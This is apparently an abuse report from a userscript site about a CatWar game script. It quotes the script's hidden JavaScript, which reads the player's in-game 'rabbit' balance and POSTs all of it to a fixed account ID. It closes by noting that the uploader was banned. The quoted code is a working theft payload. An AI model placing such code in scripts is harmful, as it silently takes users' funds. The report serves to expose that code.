CatWar UwU 2025-02-26 被举报,原因是:恶意软件或代码
This part of the code is fraudulent. She withdraws game money from the user and transfers it to another person. Just like the script author, I am not satisfied with this, and I would like to completely demolish the script page.
=======
const url = 'https://catwar.net/rabbit';
fetch(url)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok ' + response.statusText);
}
return response.text();
})
.then(html => {
const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');
const balanceElement = doc.querySelector('p span b');
const balance = balanceElement ? parseInt(balanceElement.textContent) : 0;
const data = new URLSearchParams({
rabbit: balance,
cat: 1236261,
comment: ''
});
return fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: data.toString()
});
})
lbirtem已封禁(被举报用户)已经有:
管理员已通过该举报。